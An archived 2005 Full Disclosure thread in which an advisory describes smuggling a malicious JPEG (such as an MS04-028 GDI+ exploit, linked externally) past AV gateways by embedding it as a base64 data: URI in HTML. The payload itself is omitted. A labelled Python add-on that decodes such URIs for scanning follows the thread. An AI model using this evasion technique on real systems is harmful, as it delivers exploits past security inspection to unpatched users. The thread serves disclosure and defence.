Full Disclosure mailing list archives

RE: Multi-vendor AV gateway image inspection bypass vulnerability


From: "Mark Senior" <Mark.Senior () gov ab ca>
Date: Tue, 11 Jan 2005 13:22:45 -0700

Trend Micro OfficeScan client (version 6.5, virus definitions from 10
Jan 2005) didn't catch it in my case.

I copied the HTML section from the original message straight to a text
file and scanned that.  I suppose it's possible some text wrapping
munged the original posting.

Cheers
Mark


-----Original Message-----
From: full-disclosure-bounces () lists netsys com
[mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Danny
Sent: January 11, 2005 12:14
To: Darren Bounds
Cc: bugs () securitytracker com; vulnwatch () vulnwatch org;
bugtraq () securityfocus com; list () securiteam com;
full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Multi-vendor AV gateway image inspection
bypass vulnerability

On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
<dbounds () intrusense com> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multi-vendor AV gateway image inspection bypass vulnerability
January 10, 2005

A vulnerability has been discovered which allows a remote attacker to
bypass anti-virus (as well as other security technologies such as IDS
and IPS) inspection of HTTP image content.

By leveraging techniques described in RFC 2397 for base64 encoding
image content within the URL scheme, a remote attacker may encode a
malicious image within the body of an HTML formatted document to
circumvent content inspection.

For example:

http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php

The source code at the URL above will by default create a JPEG image
that will attempt (and fail without tweaking) to exploit the Microsoft
MS04-028 GDI+ vulnerability.  The image itself is detected by all AV
gateway engines tested (Trend, Sophos and McAfee); however, when the
same image is base64 encoded using the technique described in RFC 2397
(documented below), inspection is not performed and the image is
delivered and rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL
scheme, Firefox, Safari, Mozilla and Opera do and will render the data
and thus successfully execute the payload if the necessary OS and/or
application patches have not been applied.

## BEGIN HTML ##

<html>
<body>
<img
src="data:image/gif;base64,[base64-encoded image data omitted]">
</body>
</html>

## END HTML ##

Solution:

While AV vendor patches are not yet available, fixes for all currently
known image vulnerabilities are and have been for several months.  If
you have not yet applied them, you have your own negligence to blame.

Contributions:

Thanks to Scott Roeder and Jacinto Rodriquez for their assistance in
platform testing.

I believe TrendMicro's OfficeScan (client-server scanner) will catch it,
but I am not sure about their gateway device. What was their response?

...D
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
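As an added example (not part of the advisory, the thread, or any vendor's product), here is the gateway-side check the advisory implies is missing: it pulls each RFC 2397 data: URI out of the markup, decodes the base64 (tolerating the line wrapping Mark mentions), returns the raw bytes so the AV engine can scan them like any fetched image, and flags that the sample declares image/gif while actually carrying a JPEG header. The function names and SAMPLE_HTML are constructed for this illustration.

```python
import base64
import re
from urllib.parse import unquote

# RFC 2397: data:[<mediatype>][;param=value]*[;base64],<data>; <data> may wrap across lines
DATA_URI_RE = re.compile(
    r"""data:(?P<type>[\w.+-]+/[\w.+-]+)?(?P<params>(?:;[^;,"'>]+)*?)"""
    r"""(?P<b64>;base64)?,(?P<data>[^"'>]*)""",
    re.IGNORECASE,
)

# Leading bytes of image formats a gateway would normally scan as objects.
MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\x89PNG\r\n\x1a\n": "image/png",
}

def sniff_type(data: bytes) -> str:
    """Identify the real content type from the leading bytes, not the declared one."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return "application/octet-stream"

def inspect_html(html: str) -> list[dict]:
    """Decode every data: URI in the markup into the raw object so the gateway can
    scan it like a fetched image, and flag a declared/actual type mismatch."""
    results = []
    for m in DATA_URI_RE.finditer(html):
        declared = (m.group("type") or "text/plain").lower()
        raw = m.group("data")
        if m.group("b64"):
            raw = re.sub(r"\s+", "", raw)            # undo line wrapping
            raw += "=" * (-len(raw) % 4)             # restore stripped padding
            try:
                payload = base64.b64decode(raw)
            except ValueError:                       # binascii.Error is a ValueError
                payload = b""                        # malformed: still worth flagging
        else:
            payload = unquote(raw).encode("latin-1") # percent-encoded form
        actual = sniff_type(payload)
        results.append({"declared": declared, "actual": actual, "size": len(payload),
                        "mismatch": declared.startswith("image/") and actual != declared,
                        "payload": payload})         # hand these bytes to the AV engine
    return results

# Constructed sample: a wrapped data URI declared as GIF but carrying a JPEG (FF D8 FF) header.
SAMPLE_HTML = '<html><body>\n<img\nsrc="data:image/gif;base64,/9j/4AAQ\nSkZJRgA=">\n</body></html>'
```

A gateway that only inspects objects fetched by URL never sees the decoded bytes; running the HTML body through inspect_html and scanning each "payload" closes that gap.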
